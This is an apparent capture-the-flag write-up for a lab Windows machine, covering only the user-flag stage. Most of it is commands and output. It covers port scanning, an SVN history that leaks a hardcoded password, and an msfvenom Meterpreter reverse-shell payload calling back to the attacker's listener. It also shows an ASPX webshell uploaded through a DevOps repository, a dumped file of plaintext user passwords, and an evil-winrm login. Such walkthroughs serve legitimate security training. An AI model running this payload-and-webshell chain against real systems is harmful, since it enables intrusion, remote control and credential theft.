User flag only.
Scanning
IP=10.10.10.203
nmap -T4 -sT -p 1-65535 $IPStarting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 20:22 EDT
Nmap scan report for devops.worker.htb (10.10.10.203)
Host is up (0.093s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 137.57 seconds- We find an HTTP service on port 80: http://10.10.10.203/. Nothing found for this HTTP service with gobuster
- We find SVN on port 3690
- We find WinRM on port 5985
Solution for user robisl
SVN: http://10.10.10.203:3690/
svn checkout
svn://
( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )
----------
mkdir tempsvn
cd tempsvn
svn co svn://10.10.10.203
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)# Display all commits
svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
nano /etc/hosts
10.10.10.203 devops.worker.htb
10.10.10.203 dimension.worker.htbGo back to release 2, when a file was added
svn up -r2cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
PASSWORD FOUND: User nathen, Password: wendel98
Use the previous credentials to connect to http://devops.worker.htb
URL="http://devops.worker.htb"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e -U "nathen" -P "wendel98"Generate reverse shell
KALI_IP=10.10.14.30
LISTENER_PORT=4444
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > /root/htb/windows_shell.exemsfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.30
set LPORT 4444
set ExitOnSession false
exploit -j -z- In the web app, click on SmartHotel360
- On the left, click on Repos, then Files
- Click on master, + New Branch
- Give a name to the branch
- Upload 2 files: windows_shell.exe + cmdasp.aspx
- Click Approve, Complete, Merge
- Go to http://alpha.worker.htb/cmdasp.aspx
Use a webshell
cp /usr/share/webshells/aspx/cmdasp.aspx /root/htb/cmdasp.aspxwhoami
iis apppool\defaultapppool
pwd
/c/windows/system32/inetsrv
w:/sites/spectral.worker.htb/windows_shell.exeGot a meterpreter session
cd c:\Users
ls
ls -la
total 21
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 7 17:53 .
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Oct 8 03:28 ..
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 .NET v4.5
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 .NET v4.5 Classic
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Aug 18 00:33 Administrator
lrwxrwxrwx 1 Unknown+User Unknown+Group 14 Sep 15 2018 All Users -> /c/ProgramData
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 Default
lrwxrwxrwx 1 Unknown+User Unknown+Group 16 Sep 15 2018 Default User -> /c/Users/Default
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 Public
-rw-r--r-- 1 Unknown+User Unknown+Group 174 Sep 15 2018 desktop.ini
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 22 01:11 restorer
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 8 19:22 robislUSER FOUND: robisl
W:\svnrepos\www\conf>ls -la
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = fridayPort 5985 (from Kali)
cd /usr/bin
gem install evil-winrm
evil-winrm -i 10.10.10.203 -u robisl
wolves11
C:\Users\robisl\Documents> cd ..
C:\Users\robisl\Documents> cd Desktop
C:\Users\robisl\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/8/2020 3:17 AM 34 user.txt
C:\Users\robisl\Desktop> more user.txt
936fea1a35316c9ecd40a712bbe8d6a6936fea1a35316c9ecd40a712bbe8d6a6
936fea1a35316c9ecd40a712bbe8d6a6
Solution for Administrator
Not completed